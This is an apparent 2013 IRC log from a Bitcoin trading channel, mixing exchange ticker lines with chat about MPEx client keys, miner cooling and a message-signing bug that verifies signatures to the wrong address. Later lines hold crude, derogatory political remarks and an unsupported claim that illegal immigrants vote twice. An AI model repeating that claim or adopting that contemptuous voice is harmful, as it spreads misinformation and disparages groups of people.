21:41:28 Hmm, did something change with MPEx? pyMPEx doesn't work it seems. Oct 10 21:41:56 Namworld more specifically ? Oct 10 21:42:23 did ya load the new key? Oct 10 21:42:58 [HAVELOCK] [AM1] 1 @ 0.96 BTC [-] Oct 10 21:44:31 ugh, new key eh... Oct 10 21:44:47 I use the .exe port of pympex Oct 10 21:44:59 I have to use an hex editor to change key I believe Oct 10 21:45:06 ouch. Oct 10 21:45:14 who compiled it ? Oct 10 21:46:29 No idea, can't remember who it was who made the port. Oct 10 21:46:45 But an hex editor usually works fine for changing the url or key to use Oct 10 21:47:07 http://mostodd.wordpress.com/2011/03/10/pando/ Oct 10 21:47:08 50. Pando the Trembling Giant | Most Odd - Facts of Interest Oct 10 21:47:16 alright, that may work then Oct 10 21:48:04 What server is the key on? Oct 10 21:48:23 Namworld http://trilema.com/2013/mpex-status-report/ read that thing Oct 10 21:50:27 That works too, thank you Oct 10 21:54:16 http://tofspot.blogspot.sk/2013/10/9-great-ptolemaic-smackdown-from.html i just lost there myself for cople hours Oct 10 21:54:16 The TOF Spot: 9. The Great Ptolemaic Smackdown: From Plausible to Proven Oct 10 21:54:47 oh this is the begining: http://tofspot.blogspot.sk/2013/08/the-great-ptolemaic-smackdown.html Oct 10 21:54:55 muchly recommend Oct 10 21:55:09 i second the rec Oct 10 21:56:02 Mike Flynn is an odd fellow. very much 'anti-Enlightenment (TM)'. Oct 10 21:56:42 the first article is largely factual Oct 10 21:56:42 is there a decent writeup somewhere of that Ripple "demonstration" TradeFortress made? Oct 10 21:57:07 qxzn probably not past a number of scammer threads on the forum. Oct 10 21:57:37 aw, that's a shame, it was such a good story Oct 10 21:57:55 yeah i guess so. maybe one of the bloggers recounts it sometime. Oct 10 21:58:12 bah, doesn't work Oct 10 21:58:16 To hell with this Oct 10 21:59:34 Namworld in honestly hexediting seems a little hardcore Oct 10 22:01:36 It worked before when MPEx moved to MPEx.co Oct 10 22:01:50 Those things are plaintext Oct 10 22:01:56 In any hex editor Oct 10 22:02:16 you did also resubmit your pubkey right ? Oct 10 22:03:47 Nope. Would explain it. Oct 10 22:05:20 [HAVELOCK] [AM100] 12 @ 0.008961 = 0.1075 BTC [-] Oct 10 22:06:55 Pubkey has been emailed. Oct 10 22:08:23 [HAVELOCK] [NEOBEE] 75 @ 0.00259998 = 0.195 BTC [-] Oct 10 22:11:56 http://blog.cryptographyengineering.com/2013/09/rsa-warns-developers-against-its-own.html Oct 10 22:11:56 A Few Thoughts on Cryptographic Engineering: RSA warns developers not to use RSA products Oct 10 22:11:57 for a little lol Oct 10 22:12:36 best part is the "Sam is the boldface" bit lol Oct 10 22:23:37 I see you re-added my key. Thank you. Oct 10 22:34:19 so your evil plan to hexedit an exe compile actually worked ? Oct 10 22:34:22 Effective October 28, 2013 at 4pm CT, Dwolla will be withdrawing its service offerings to virtual currency exchanges and virtual currency related services. Oct 10 22:34:36 KRS1 didn't they do this like... 3 times already ? Oct 10 22:35:09 Yes, it worked Oct 10 22:35:16 I think so, but they're still working with exchanges like campbx. Oct 10 22:35:27 this is probably it Oct 10 22:35:35 Key to use and url to submit appears as plaintext in the compile. Oct 10 22:38:55 Virtual currency is slowly becoming a bad word. Oct 10 22:39:38 Because virtual = Does not exist in people's mind. Oct 10 22:39:59 People just need to learn their bank account statements are just as virtual. Oct 10 22:40:38 If they want something not virtual, they can just hold physical gold and silver or such thing. Oct 10 22:40:46 someone needs to show them that lesson Oct 10 22:42:57 [HAVELOCK] [AM1] 5 @ 1.03639999 = 5.182 BTC [+] {4} Oct 10 22:43:41 Dwolla says Virtual Currency customers/merchants are 0.1 percent of their customer base..Hmm. Oct 10 22:43:58 [HAVELOCK] [AM100] 50 @ 0.00945598 = 0.4728 BTC [+] {3} Oct 10 22:52:06 [HAVELOCK] [HIM] 5 @ 0.098002 = 0.49 BTC [-] {2} Oct 10 22:54:45 dwolla has a customer base now ?! Oct 10 22:55:52 mircea_popescu: 1st time i heard of dwolla, the consonant cluster made me think it was a nigerian spam bank. Oct 10 22:56:18 it's a venture circuit scam thing, which is homologuous. Oct 10 22:56:54 one of the only tools people have to move cash in/out of the system Oct 10 22:57:15 for some values of "people". Oct 10 22:57:46 anyway, i guess few are aware, but as per genius satoshi design the main way to move cash into bitcoin is mining Oct 10 22:57:52 (via electricity consumption). Oct 10 22:58:05 this was always the case to date. Oct 10 22:58:27 the 2nd way is... also mining. through miner production. Oct 10 22:58:44 so take fiat out of the equation..are bitcoins actually worth anything then? I dont know of anything you can do with them besides get some goods and services, best case. Oct 10 22:58:53 yes, they are. Oct 10 22:58:57 mircea_popescu: if only this worked in reverse gear. Oct 10 22:59:26 asciilifeform the reason it can't work in reverse gear is that fiat is worthless. Oct 10 23:00:00 i was thinking more along the lines of btc to watts, rather than dollars Oct 10 23:00:05 I apparently stepped into a chat room on another planet. Oct 10 23:00:28 KRS1: nah, that's at #urbit Oct 10 23:00:39 lol for real Oct 10 23:00:42 asciilifeform i expect we will have brtc to watts. Oct 10 23:00:49 but what about the Nigerian Sperm bank? Oct 10 23:00:56 recently i had a wire fail to a supplier, and they were "well, send me bitcoin ?" Oct 10 23:04:55 Supplier of what? Oct 10 23:05:07 Wish everyone did that Oct 10 23:05:11 electronic parts. Oct 10 23:06:15 course, electricity is a monopoly in most places for good physical reasons, so i guess the btc to watt thing will be one of the later parts. Oct 10 23:06:33 but this changes little really. Oct 10 23:23:46 http://www.reddit.com/r/Bitcoin/comments/1o5enf/just_got_this_insane_email_from_bitstamp/ Oct 10 23:25:07 "Bitcoins will be transferred only after conversion into a currency." Oct 10 23:25:09 herp Oct 10 23:25:48 We kindly ask you to withdraw your Bitcoins to a wallet outside of Bitstamp.net. If you do not withdraw your Bitcoins in 24 hours as instructed in the previous paragraph, please provide us with a valid bank account held in your name in a reply to this Account Termination Notice so Bitstamp can proceed with your Account termination and send you the currencies credited to your Account within 14 business days after your Oct 10 23:25:48 Account has been terminated. Oct 10 23:25:54 pretty illogical. Oct 10 23:26:23 does the css look good? Oct 10 23:26:41 "You must have mentioned Fiat Banking." Oct 10 23:26:48 OP says below it's not a scam cuz they did close the acct Oct 10 23:26:52 that made it worth it lol Oct 10 23:42:56 [HAVELOCK] [B] [XBOND] 397 @ 0.001229 = 0.4879 BTC [-] Oct 10 23:55:43 ;;bc,stats Oct 10 23:55:46 Current Blocks: 262818 | Current Difficulty: 1.8928124928103292E8 | Next Difficulty At Block: 264095 | Next Difficulty In: 1277 blocks | Next Difficulty In About: 6 days, 10 hours, 47 minutes, and 16 seconds | Next Difficulty Estimate: 228440874.109 | Estimated Percent Change: 20.68859 Oct 10 23:56:00 heh right on track Oct 10 23:58:27 maybe it will produce 1278th block on oct 17, 00:00:01 and CB.IDIFF-E holders will eat me alive :D Oct 11 00:02:52 "KNC support just emailed me back saying that 440 ghash (what 50btc reports), 900 watts from the wall, and chip temps of 65-72c in a 58F room are 'within spec'...Not awesome." Oct 11 00:03:24 dip it in lube Oct 11 00:03:27 er.. oil Oct 11 00:04:45 ;;calc 440/900 Oct 11 00:04:45 0.488888888889 Oct 11 00:05:06 i forget what the spec was supposed to be Oct 11 00:05:18 dunno Oct 11 00:05:28 >350GH/s, <1KW for Jupiter Oct 11 00:06:36 Mineral oil is so expensive, I have thought about it many times- Oct 11 00:09:45 and it can't be changed for water cooler, can be? Oct 11 00:11:24 [HAVELOCK] [AM100] 100 @ 0.00968748 = 0.9687 BTC [+] {6} Oct 11 00:11:53 I would have to look at it and see what would fit it, otherwise that could get really expensive - it also might too big of a system to cool it Oct 11 00:11:59 ight be too Oct 11 00:12:05 m Oct 11 00:12:23 watercooling is prolly not worth it Oct 11 00:16:58 I thinnk I am going to dnk a blade in mineral oil and see how it does on temps - just for the hell of it Oct 11 00:18:31 so then 900 watt 440 gh is indeed in spec neh ? Oct 11 00:18:53 jurov nah, you need special oil pumps. Oct 11 00:19:40 for water cooling a pc? not rly Oct 11 00:19:46 i'm no expert.. supposedly it works with normal pc (except hdd), but 1kW is prolly too much Oct 11 00:19:58 jborkl nj.gov/health/eoh/rtkweb/documents/fs/1437.pdf‎ Oct 11 00:20:08 i mean, submerging it into oil Oct 11 00:20:08 make sure you know what you're doing with that. Oct 11 00:21:37 it has a slight but present fire hazard and is toxic if it burns. Oct 11 00:21:41 also a bitch to extinguish Oct 11 00:21:59 hmm, well maybe not then Oct 11 00:22:32 you can test if the blown cap can set it on fire Oct 11 00:22:36 lol Oct 11 00:23:05 http://trilema.com/2013/and-now-i-shall-be-off-scarfing-smoked-salmon-and-fresh-apple-pie-seasoned-with-free-market-tears-or-why-a-collection-of-confused-retards-does-not-amount-to-a-free-market/#comment-95504 Oct 11 00:23:06 And now I shall be off scarfing smoked salmon and fresh apple pie seasoned with free market tears, o Oct 11 00:23:11 this is turning into quite the argument Oct 11 00:31:13 I wonder how the KNC hosting center is holding up to 900 w per unit? Reptilla should take trip to the sauna in there Oct 11 00:31:38 considering they bought 850 w power supplies, as per the photos Oct 11 00:31:56 good AC should be able to pump out something in the .1 to 1 MW per floor Oct 11 00:32:02 o Oct 11 00:34:06 good PSU's can supply more than rated but still something's fishy Oct 11 00:36:09 it is possible the unit just works with whatever power it's being fed. Oct 11 00:36:22 the knc ppl are slightly underfeeding it,w hich is why it doesn't pop as much ? Oct 11 00:51:36 which is why it doesn't pop as much ? lol Oct 11 00:51:57 well they said theirs don't explode right ? Oct 11 00:54:23 http://imgur.com/a/s44NM Oct 11 00:54:23 KNC Jupiter - Imgur Oct 11 00:54:31 nice shipping Oct 11 00:55:35 mircea_popescu: http://arstechnica.com/security/2013/09/fatal-crypto-flaw-in-some-government-certified-smartcards-makes-forgery-a-snap/ <- make sure your s.nsa product isn't stupid like this. :) Oct 11 00:56:07 im just here to collect the praise. admonitions go to asciilifeform :D Oct 11 00:59:02 anyway, someone should make a web key checker already Oct 11 00:59:40 As many of 10,000 of these smartcards may provide little or no cryptographic protection despite receiving two internationally recognized certifications. Oct 11 00:59:55 ^ the web checker would be no better than these certifications Oct 11 01:01:26 and i don't see how would devote hours to try cracking all submitted keys like the researchers did Oct 11 01:01:36 jurov it couldn't identify a good key, but it could identify a bad one Oct 11 01:03:35 nosuchagency can provide it.. as a marketing tool Oct 11 01:03:45 perhaps. Oct 11 01:11:22 [MPEX] [S.MPOE] 3100 @ 0.00085104 = 2.6382 BTC [-] Oct 11 01:15:26 [HAVELOCK] [NEOBEE] 246 @ 0.0024189 = 0.595 BTC [-] {2} Oct 11 01:17:28 [HAVELOCK] [NEOBEE] 400 @ 0.00223127 = 0.8925 BTC [-] {6} Oct 11 01:50:01 ;;nethash Oct 11 01:50:01 1768924.77853 Oct 11 01:50:03 ;;bcstats Oct 11 01:50:06 Current Blocks: 262831 | Current Difficulty: 1.8928124928103292E8 | Next Difficulty At Block: 264095 | Next Difficulty In: 1264 blocks | Next Difficulty In About: 6 days, 8 hours, 26 minutes, and 31 seconds | Next Difficulty Estimate: 228797587.534 | Estimated Percent Change: 20.87705 Oct 11 01:55:16 Hey vexual you might like: http://www.youtube.com/watch?v=cwGdzkJD5N8 Oct 11 03:21:30 [MPEX] [S.MPOE] 450 @ 0.00084959 = 0.3823 BTC [-] Oct 11 03:32:41 [MPEX] [S.MPOE] 7500 @ 0.00084917 = 6.3688 BTC [-] {2} Oct 11 03:34:43 [HAVELOCK] [CBTC] 2960 @ 0.00019003 = 0.5625 BTC [-] {4} Oct 11 03:35:44 [HAVELOCK] [CBTC] 4897 @ 0.00019002 = 0.9305 BTC [-] {3} Oct 11 03:36:45 [HAVELOCK] [CBTC] 6058 @ 0.00019 = 1.151 BTC [-] {3} Oct 11 04:06:14 [MPEX] [S.MPOE] 1900 @ 0.00084776 = 1.6107 BTC [-] Oct 11 04:31:39 [MPEX] [S.MPOE] 607 @ 0.00084806 = 0.5148 BTC [+] Oct 11 04:34:41 [MPEX] [S.MPOE] 4350 @ 0.00085276 = 3.7095 BTC [+] Oct 11 04:34:49 So... I think math is broke. Apparently the public key for one of my addresses can hash into a different addresss. Oct 11 04:38:12 that's odd. you mean with a different hash ? Oct 11 04:42:37 mircea_popescu> im just here to collect the praise. admonitions go to asciilifeform :D <- in that case... good idea, that cardano thing! :) Oct 11 04:42:53 ty ty Oct 11 04:43:18 mircea_popescu: Yeah. I'm working on a report. The report will probably be in the form of a post titled "Fuckity Fuck Fuck" as I GPG sign a revocation of a certain address's message signing privileges. Oct 11 04:44:35 BingoBoingo: it's actually very common for gpg (the short pub key) Oct 11 04:44:41 try and reproduce the behaviour first. Oct 11 04:44:48 it happened to me too Oct 11 04:45:04 that's why people should give the full fingerprint Oct 11 04:45:08 BingoBoingo: Bitcoin addresses are hashed public keys, right? The private key that corresponds to that public key actually has two public keys. A compressed version and a noncompressed version. Oct 11 04:45:46 pankkake: This isn't GPG. It is RIPEMD 160 being able to assign a public key two (maybe more) bitcoin addresses. Oct 11 04:46:07 Well, yeah. Oct 11 04:46:17 256 bits doesn't fit into 160 bits. Oct 11 04:46:18 Fucking NSA bullshit undermining the Integrity of Mathematics. Oct 11 04:46:33 I imagined it to be exceedingly rare though. Oct 11 04:46:37 oh Oct 11 04:46:42 BingoBoingo that's not possible. Oct 11 04:47:05 multiple privates might hash to the same one address, but that's insanely rare. Oct 11 04:47:17 the same private having ambiguous results however is impossible. Oct 11 04:47:53 the first would be a collision. the second would be a case of 4+5 being sometimes 8, sometimes 9 Oct 11 04:47:54 BingoBoingo, are you saying the same 256 bit public key ran through RIPEMD160 gave you two different answers? Oct 11 04:49:34 mircea_popescu: Jere_Jones It is just a standard Bitcoin address's underlying public key. mircea_popescu I'm not sure what to think anymoar. I will say fuck vanitygen. Oct 11 04:49:55 you using a web based service to make the keys ? Oct 11 04:50:11 they're shit. i could never get them to make usable addresses. Oct 11 04:51:01 mircea_popescu: The key wasn't generated on a web based service, but a web based service turned the public key into an unexpected address. Oct 11 04:51:13 because they're broken lol Oct 11 04:51:20 retry with the original method. Oct 11 04:52:00 If you have the private key, turn that into the other public key and see if that gives you the address you're looking for. Oct 11 04:52:51 1LC9GzYK1zjrG9zAvMPExcwHTP8aPYPMyY apparently is an imposter for my beloved 1LvCuntsJyFFQsLuJhBXBPokbQa7SAyMr4 address in the message signed on my contacts and credentials page. I'm trying more messages at the moment, but it looks like GPG is going to have to save the day. Oct 11 04:53:21 i think you're jumping to conclusions. Oct 11 04:53:21 I can help you but you need the private key. Oct 11 04:53:34 mircea_popescu: Maybe. Oct 11 04:54:04 Maybe I should go to #bitcoin-dev or wherever the muppets live and troll them up a bit with this. Oct 11 04:54:20 use a proper process to turn privkey into pubkey then hash that and see what you get. Oct 11 04:54:30 wherwe website != proper process Oct 11 04:54:30 mind to give out some samples like messages + signatures for both addresses? Oct 11 04:55:53 dexX7: plug the message and signature here http://www.thedrinkingrecord.com/contact-and-credentials/ into http://brainwallet.org/#verify Oct 11 04:56:48 1LC9GzYK1zjrG9zAvMPExcwHTP8aPYPMyY Oct 11 04:56:51 i see, sec Oct 11 04:58:30 The problem is that 1LC9GzYK1zjrG9zAvMPExcwHTP8aPYPMyY could have signed the same message. Maybe it could have signed a more malicious message. Fuck. Just because elliptic curves are sexy doesn't mean they should be used everywhere. Oct 11 04:59:26 i bet you 1LC9GzYK1zjrG9zAvMPExcwHTP8aPYPMyY could not have signed the same message. Oct 11 05:00:26 mircea_popescu: Maybe. Maybe it is just some odd intersection and I need to go back to adding giberish at the end of everything I sign. Oct 11 05:00:49 I'm not showing that message verigying with 1LvCunts Oct 11 05:04:29 i tell uyou, the brainwallet implementation is borkt. Oct 11 05:04:39 might be because of how javascript runs on some systems Oct 11 05:04:45 Jere_Jones: At the most charitable where there isn't a collision it ought probably assumed at a minimum Bitcoin address signing merely sucks and is poorly implemented. If you are the sort who goes for minimums. Oct 11 05:04:58 It doesn't verify in bitcoin-qt Oct 11 05:05:01 mircea_popescu: Maybe. You'd think they could at least verify things right. Oct 11 05:05:05 hehe odd Oct 11 05:05:15 1HF8us88HGVh7gYEJpjxXS79AW2vDyZiAp Oct 11 05:05:24 is the address that is resolved for this msg/signature Oct 11 05:05:29 ha! Oct 11 05:05:33 so that's a third. Oct 11 05:05:38 Maybe the problem isn't the signature or the message. Maybe Bitcoin Address signing is just fucked. Oct 11 05:05:39 the other two are invalid Oct 11 05:05:41 listen, use a witness signature implementation and check. Oct 11 05:05:46 the site is whack. Oct 11 05:06:25 verified with stock btc client + some php lib that i'm using to resolve (msg, sig) -> addr Oct 11 05:06:50 but it actually should work with "1LvCuntsJyFFQsLuJhBXBPokbQa7SAyMr4"? Oct 11 05:06:52 Yep. bitcoin-qt verified it with that address. Oct 11 05:08:47 not for me Oct 11 05:09:19 I meant 1HF8us Oct 11 05:09:21 Jeff Gazarizadickbag can suck mine. Oct 11 05:09:24 http://i.imgur.com/GLnJGZ9.png Oct 11 05:09:32 ah k Oct 11 05:09:52 hm Oct 11 05:10:08 they have some bug in the sig implementation ? Oct 11 05:10:36 anyone willing to make 1k keys, sign 1k messages and see if the signed messages actually resolve to the proper keys ? Oct 11 05:10:47 mircea_popescu: Probably they have a bug, in the least bad imagining of things. Oct 11 05:11:22 BingoBoingo are you sure you didn't sign with that other address tghrough some process involving for instance vodka ? Oct 11 05:12:27 <[\\\]> lol Oct 11 05:12:43 <[\\\]> Are you sure you even signed it and didn't copy the sig from someone else? Oct 11 05:13:11 mircea_popescu: Rather sure. I don't have a key for that other address in any of my wallets. The pages on the blog were some of the few things I remember making sober. Oct 11 05:13:39 apparently sober is bad luck for you. anyway, this warrants some testing. Oct 11 05:14:22 <[\\\]> not really Oct 11 05:14:30 PalePhoenix pankkake parseval parseval1 Perlboy pgp pizzaman1337 PsychoticBoy Pucilowski Oct 11 05:14:31 <[\\\]> address signing isn't a replacement for gpg signing Oct 11 05:14:51 no, but if address signing works so you sign with one address and it verifyes with another i'd like to know Oct 11 05:15:04 <[\\\]> Why? Oct 11 05:15:11 because there's enough lols in there to keep us going through a day or two even Oct 11 05:15:21 [MPEX] [S.MPOE] 1600 @ 0.0008514 = 1.3622 BTC [-] Oct 11 05:15:31 mircea_popescu: Yeah, in the meantime: http://www.thedrinkingrecord.com/contact-and-credentials/ I'll be watching BitBet rather closely to sweep any winnings to safer addresses. Oct 11 05:15:35 <[\\\]> has AM listed on MPEX yet? Oct 11 05:15:46 mnop Oct 11 05:16:23 ;;ident BingoBoingo Oct 11 05:16:23 <[\\\]> q Oct 11 05:16:24 Nick 'BingoBoingo', with hostmask 'BingoBoingo!~BingoBoin@unaffiliated/bingoboingo', is not identified. Oct 11 05:16:43 mircea_popescu: Let me gribble real quick Oct 11 05:16:57 just wanted to see if you made an accct Oct 11 05:17:22 whoa! Oct 11 05:17:23 mircea_popescu: I finally made a nickserve account Oct 11 05:17:48 i just got pointed out to me that 1LC9GzYK1zjrG9zAv >>MPEx<< cwHTP8aPYPMyY Oct 11 05:18:00 all your itams are belong to me ? Oct 11 05:21:08 I wonder if Havelock is being DDOS'd or if they just can't handle the load of being the stock exchange that receives the most traffic. Oct 11 05:21:17 ;;ident BingoBoingo Oct 11 05:21:17 Nick 'BingoBoingo', with hostmask 'BingoBoingo!~BingoBoin@unaffiliated/bingoboingo', is identified as user BingoBoingo, with GPG key id 309BB8D7F3251143, key fingerprint ADD7A9A28F85E5EF1F51904F309BB8D7F3251143, and bitcoin address None Oct 11 05:21:47 I have updated http://www.thedrinkingrecord.com/contact-and-credentials/ Oct 11 05:22:18 Jere_Jones not that much trading for all that traffic. Oct 11 05:22:31 I *know*! Oct 11 05:25:39 It's kind of funny I registered with gribble months ago, yet on I only registered with nickserv last week. Oct 11 05:27:49 mircea_popescu asciilifeform: Is there a rough estimate on how the Cardano will be priced? Oct 11 05:28:13 well surely there is, but it's not public. Oct 11 05:31:24 mircea_popescu: I'm a bit curious because the Cardono seems like something a person would purchase a few of. Oct 11 05:31:38 one for each gf! Oct 11 05:35:22 mircea_popescu: One for each girl. One for each dude providing muscle. The possibilities are endless. General Patraeus would have had a career if only he could have given his side bitch a Cardano. Oct 11 05:35:43 aptly put Oct 11 05:36:15 I imagine a Cardano gift set with lacey panties and a digital camera and a second gift set with a Cardano and a blackjack. Oct 11 05:36:16 anyway, to quote the main man, here Oct 11 05:36:16 shaving pennies off the draft design Oct 11 05:37:34 BingoBoingo: It appears that the people with the expertise you need aren't paying attention in #bitcoin-dev. I'd try back in 12 hours. Oct 11 05:38:43 Jere_Jones: Honestly it doesn't seem like a matter where I need their expertise so much as they need my accident. I mean if they know how this IRC thing works they will know to scroll up. Oct 11 05:40:24 Jere_Jones: If they don't know to scroll up or check logs why are they on the internet and not Facebook. Oct 11 05:41:20 They will, honestly, need more details. A bug report without replication steps is fairly useless. Oct 11 05:43:42 that's a point. Oct 11 05:44:48 Jere_Jones: Well I'm not offering the private key until at least the last BitBet associated with that address resolves. Maybe some elliptic surves intersected at the point of that message. Maybe it is something worse. It is honestly more their problem than mine though I will be happy to offer them information short of the private key. The replication steps are surprisingly short and I imagine unhelpful. Oct 11 05:45:17 BingoBoingo you wouldn't offer the private key tho Oct 11 05:46:37 mircea_popescu: Of course not, unless someone was paying out more for it than the outstanding BitBet Bets paying to the derived address. Oct 11 05:47:48 can you sign another message with that address btw ? Oct 11 05:48:03 you could do this as a succession of screenshots. here i sign X with address Y Oct 11 05:48:10 here i try to check it and it checks to address Z Oct 11 05:50:13 mircea_popescu: Sure, just for shits and giggles I will hope it isn't some PRNG problem. Oct 11 05:51:21 1. ’ is the source 2. ’ != ´ 3. strlen("’") = 3 x_X 4. it creates a not matching signature every time, if you use ’ + more than 250 other chars Oct 11 05:52:19 wait what ? Oct 11 05:53:20 yup Oct 11 05:53:26 mircea_popescu: http://bitbin.it/kChBkUKd dexX7 Are you implying Bitcoin address signatures are more worthless than I though? Oct 11 05:53:43 dexX7 let me say this myself to see. Oct 11 05:54:31 if using particular characters such as ´, the signing goes bonkers creating signatures that go with random addresses instead of the correct address ? Oct 11 05:55:38 only if you add >= 250 other chars Oct 11 05:55:51 wow. Oct 11 05:55:56 how do you know this ? Oct 11 05:56:22 Fuck this is why Bitcoin needs a mother fucking Spec. Oct 11 05:57:23 i tested it by shortening the message and replacing the chars with others Oct 11 06:00:44 dexX7: Still, there is no reason why Bitcoin address signed messages can't have a container like GPG signatures do. It would be so much easier to demonstrate this is broken or solid if only there were a standard container for signed messages. Oct 11 06:01:44 like ----BEGIN ...? Oct 11 06:03:07 dexX7: I don't know if that is sarcasm, but yes. That is actually incredibly useful to have. Oct 11 06:04:13 i see. yes, it is. Oct 11 06:06:07 dexX7: For better or worse the GPG armored format lets idiots import keys and signatures. I contrast the bitcoin address format has not container and simply solicits information. Apparently that information can often be wrong. Oct 11 06:06:24 dexX7 well wd. Oct 11 06:06:32 this is so much derp i have trouble believing it. Oct 11 06:06:42 did you test it? Oct 11 06:06:59 i don't even dare imagine what'd have happened should anyone have taken garzik's alternative exchange seriously and puit money/effort into that Oct 11 06:07:08 only to discover 6 months later that well... Oct 11 06:07:32 I'm probably just going to watch this for a few times, cum, and then take a relaxing walk. https://www.youtube.com/watch?v=PdJRafNcfkw Oct 11 06:07:58 dexX7 nope, i don't have software that does the signature stuff. Oct 11 06:08:12 no standard btc client? Oct 11 06:08:27 nothing recent. Oct 11 06:08:46 mircea_popescu: I've also started and aborted a tor study. Oct 11 06:09:17 Box got owned. Nothing subtle at all. Oct 11 06:09:25 lol Oct 11 06:09:40 BingoBoingo: care to elaborate ? Oct 11 06:10:32 asciilifeform: I'm authed on gribble /msg me and I will offer some things on a more disposable venue Oct 11 06:14:01 asciilifeform: If you want a lot of details use http://www.thedrinkingrecord.com/pgp/ directed at bingoboingo357@gmail.com **** BEGIN LOGGING AT Fri Oct 11 12:42:11 2013 Oct 11 12:47:19 [MPEX] [S.MPOE] 4750 @ 0.00084861 = 4.0309 BTC [-] {3} Oct 11 13:00:46 .d Oct 11 13:00:46 189281249.28103 | Next Diff in 1176 blocks | Estimated Change: 21.0500% in 6d 10h 42m 28s Oct 11 13:01:34 [MPEX] [S.MPOE] 2350 @ 0.00085477 = 2.0087 BTC [+] Oct 11 13:14:47 [MPEX] [S.MPOE] 3012 @ 0.00084704 = 2.5513 BTC [-] Oct 11 13:33:34 so what happens when diff overflows longint on 32bit platforms ? Oct 11 13:36:05 mircea_popescu: isn't it float? Oct 11 13:36:34 a Oct 11 13:36:45 i dunno if its implemented as two ints or a float or what Oct 11 13:37:11 yes, maybe something can overflow in process of converting it from past hashrate Oct 11 13:38:15 if its a fgloat i guess we're safe, good up to 10^38 if memory serves Oct 11 13:40:28 they seem to use bignums (via own library) Oct 11 13:42:47 well that's reassuring. Oct 11 13:43:08 so what happens when diff overflows random quirky implementation of bignums on 32bit platforms ? Oct 11 13:44:08 ... Oct 11 13:44:59 the diff overflows!!1 Oct 11 13:45:17 [MPEX] [S.MPOE] 5625 @ 0.00084567 = 4.7569 BTC [-] {2} Oct 11 13:55:28 [MPEX] [S.MPOE] 4206 @ 0.00084616 = 3.5589 BTC [+] Oct 11 14:01:34 [MPEX] [S.MPOE] 7800 @ 0.00084616 = 6.6 BTC [+] Oct 11 14:08:48 lmao JPM posts a loss Oct 11 14:08:55 on LEGAL charges. Oct 11 14:09:18 dear all... i think you'd better review your legal budged. it jpm can't quite afford it... Oct 11 14:11:43 [MPEX] [S.MPOE] 6182 @ 0.00084616 = 5.231 BTC [+] Oct 11 14:21:53 [HAVELOCK] [HIM] 250 @ 0.08522245 = 21.3056 BTC [-] {9} Oct 11 14:25:56 http://www.youtube.com/watch?v=L89IDDq30J8 Oct 11 14:25:57 Good Morning Song - YouTube Oct 11 14:26:11 Good morning from the 'states Oct 11 14:32:34 http://trilema.com/2013/bad-news-for-jpm/ Oct 11 14:32:35 Bad news for JPM pe Trilema - Un blog de Mircea Popescu. Oct 11 14:46:18 [HAVELOCK] [AM100] 111 @ 0.00883557 = 0.9807 BTC [-] {6} Oct 11 14:56:28 [MPEX] [S.MPOE] 7108 @ 0.00084573 = 6.0114 BTC [-] {2} Oct 11 15:00:32 [HAVELOCK] [XBOND] [PAID] 0.69348300 BTC to 1`386`966 shares, 50 satoshi per share Oct 11 15:13:45 [MPEX] [S.MPOE] 4750 @ 0.00085081 = 4.0413 BTC [+] Oct 11 15:44:48 mircea_popescu: http://www.downforeveryoneorjustme.com/trilema.com Oct 11 15:45:26 ty. lessee here Oct 11 15:46:03 davout i see it atm. jus a leetal bit of flooding Oct 11 15:46:18 [HAVELOCK] [CBTC] 5500 @ 0.0001811 = 0.9961 BTC [-] {3} Oct 11 15:55:49 heh "iPhone 5S users report 'Blue Screen Of Death' reboots" Oct 11 15:56:38 apple is now microsoft! Oct 11 15:56:49 from Gox "Finally, the implementation of this new infrastructure is a prerequisite before we can initiate Midas. There is still a lot of work to be done before we can launch Midas but rest assured this is a priority project for us. Once Midas is up and running we will be able to offer the trading of other digital currencies." Oct 11 15:57:00 reddite response: "Would be nice if they started trading bitcoin first." Oct 11 15:58:03 lol Oct 11 15:58:10 lol Oct 11 16:00:01 lol Oct 11 16:01:07 dude the unending deluge of retared socialist propaganda on the topic of the us budget. Oct 11 16:01:21 so still no communication on widthdrawal issues? it looks like even eur is taking a lot of time Oct 11 16:01:34 pankkake don't worry, it's a priority. Oct 11 16:02:01 pankkake: victims have to deposit so that the other victims can withdraw Oct 11 16:02:11 http://s3-ec.buzzfed.com/static/2013-10/enhanced/webdr03/8/15/anigif_enhanced-buzz-16008-1381258970-14.gif Oct 11 16:02:33 [MPEX] [S.MPOE] 7450 @ 0.000852 = 6.3474 BTC [+] {2} Oct 11 16:02:47 Scrat also a priority. Oct 11 16:03:05 http://s3-ec.buzzfed.com/static/2013-10/enhanced/webdr02/8/15/anigif_enhanced-buzz-21971-1381259005-9.gif Oct 11 16:03:12 about the shutdown thank god I follow zero traditional media Oct 11 16:03:29 the only thing to say is "Washington Monument syndrome" Oct 11 16:04:06 the whole page gets pretty funny http://www.buzzfeed.com/daves4/the-whitest-things-that-have-ever-happened Oct 11 16:04:31 "Obama and his urbanized, racially diverse supporters are transforming America into something unrecognizable" Oct 11 16:04:48 get a load of that shit. obama at 37%, one over bush's career low, has supporters now ? Oct 11 16:05:10 the perpetually-on-welfare, illegal immigrants and all the rest of the "low information voter" scum is urbanized >? Oct 11 16:05:14 what the fuck is wrong with people. Oct 11 16:05:44 illegal immigrants vote? Oct 11 16:05:58 in the us they do, yes. Oct 11 16:05:59 in the journalist' mind racially diverse supporters are Oct 11 16:06:00 twice. Oct 11 16:06:15 once illegally and once imigratorily. Oct 11 16:06:17 transforming America into something unrecognizable and urbanized is just a way to make them Good Guys. it doesn't matter if it's accurate Oct 11 16:06:37 ugh wrong paste Oct 11 16:06:46 what annoys me most is that the prostitute i quoted is a) a pulizer prize winner and b) not actually getting paid for his sexual services. Oct 11 16:07:25 in the journalists' minds "racially diverse" and "urbanized" is just a way to make them Good Guys. it doesn't matter if it's accurate Oct 11 16:07:54 i'm aware. Oct 11 16:10:44 lol at stolen pony Oct 11 16:23:54 [MPEX] [S.MPOE] 4190 @ 0.00085056 = 3.5638 BTC [-] Oct 11 16:27:58 [HAVELOCK] [B] [XBOND] 574 @ 0.00115592 = 0.6635 BTC [-] {5} Oct 11 16:29:00 [HAVELOCK] [B] [XBOND] 147 @ 0.00111201 = 0.1635 BTC [-] {4} Oct 11 16:34:29 Oct 11 16:38:10 [MPEX] [S.MPOE] 2500 @ 0.00085008 = 2.1252 BTC [-] {2} Oct 11 16:41:12 [MPEX] [S.MPOE] 3462 @ 0.00085142 = 2.9476 BTC [+] {2} Oct 11 16:47:18 [HAVELOCK] [AM100] 18 @ 0.0088 = 0.1584 BTC [-] Oct 11 16:48:19 [HAVELOCK] [AM100] 25 @ 